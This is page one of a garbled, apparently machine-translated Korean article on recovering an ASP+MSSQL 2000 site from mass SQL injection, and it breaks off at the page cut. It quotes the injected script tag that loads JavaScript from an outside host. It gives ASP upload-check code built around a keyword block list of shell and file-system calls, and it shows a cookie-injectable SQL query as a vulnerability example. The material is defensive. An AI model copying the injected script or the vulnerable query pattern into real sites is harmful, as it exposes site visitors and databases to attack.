ASP+MSSQL 2000 데이터베이스 대량 주입 후 해결 방법 1/2 페이지
“ update set =replace( ,'<Script Src=http://c.n%75clear3.com/css/c.js></Script>','') ”
flymorn 은 사 이 트 를 자세히 검사 한 결과 사이트 에 몇 가지 안전 문제 가 존재 하 는 것 을 발견 했다.첫째,사이트 에 업로드 구멍 이 존재 한다.파일 을 업로드 하려 면 관리자 인증 이 필요 하고 업로드 파일 에 대한 파일 형식 인증 도 이 루어 졌 지만 관리자 인증 은 cookies 를 사 용 했 고 cookies 는 위 조 될 수 있 으 며 사진 을 업로드 한 후 해당 파일 의 내용 에 대해 어떠한 판단 도 하지 않 으 면 사진 목마 도 올 라 갈 가능성 이 높다.해결 조치:1 업로드 파일 기능 삭제(현실 적 이지 않 음);2.업로드 사용자 인증 을 session 인증 으로 수정 합 니 다.3.올 린 파일 내용 을 검증 하고 그림 목마 라면 삭제 합 니 다.다음 과 같은 검증 코드 를 참고 할 수 있 습 니 다
''=============== start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write("<script>alert(' , !');history.back();</script>")
Response.End
end if
next
''================= end===================
둘째,사이트 에 cookies 주입 구멍 이 존재 합 니 다.프로 그래 밍 에서 서버 의 비용 을 줄 이기 위해 모든 사용자 가 로그 인 한 후에 cookies 로 검 증 했 습 니 다.이 cookies 에는 사용자 의 ID 와 NAME 가 저장 되 어 있 습 니 다.cookies 는 해커 에 의 해 자주 위 조 된 것 으로 알려 져 있 습 니 다.이것 은 그 중의 하나 입 니 다.또한 일부 외부 매개 변 수 는 엄격 한 request.form 과 request.query string 으로 내용 을 가 져 오지 않 았 으 며 간편 하기 위해 request("id")와 같은 방식 을 사용 했다. ASP 의 request 는 form,query string 에서 먼저 내용 을 가 져 오 는 것 을 알 고 있 습 니 다.이 두 개가 비어 있 으 면 cookies 에서 내용 을 가 져 와 야 합 니 다.여러분 은 프로그램 디자인 에서 request.form 과 request.query string 의 SQL 주입 을 고려 하기 때문에 보통 request.form 과 request.query string 을 걸 러 서 sql 주입 을 합 니 다.그러나 하필 이면 cookies 방식 의 주입 을 걸 러 내 는 것 을 잊 었 다.다음 과 같은 sql 문 구 를 살 펴 보 겠 습 니 다
SQL="select * from where id="&request("id")
만약 에 이 id 가 마침 cookies 를 통 해 값 을 얻 었 다 면 생각해 보 세 요.이것 은 얼마나 무 서운 일 입 니까?주입 자 는 id 라 는 허위 cookies 를 쉽게 위조 할 수 있 습 니 다.이 id 의 cookies 는 서버 에서 분 배 된 것 이기 때 문 입 니 다.이 cookies 는 다음 과 같은 코드 를 위조 할 수 있 습 니 다.1 2 다음 페이지 전문 을 읽다
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
ASP+MSSQL 2000 데이터베이스 대량 주입 후 해결 방법 1/2 페이지flymorn 은 사 이 트 를 자세히 검사 한 결과 사이트 에 몇 가지 안전 문제 가 존재 하 는 것 을 발견 했다.첫째,사이트 에 업로드 구멍 이 존재 한다.파일 을 업로드 하려 면 관리자 인증 이 필요 하고 업...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.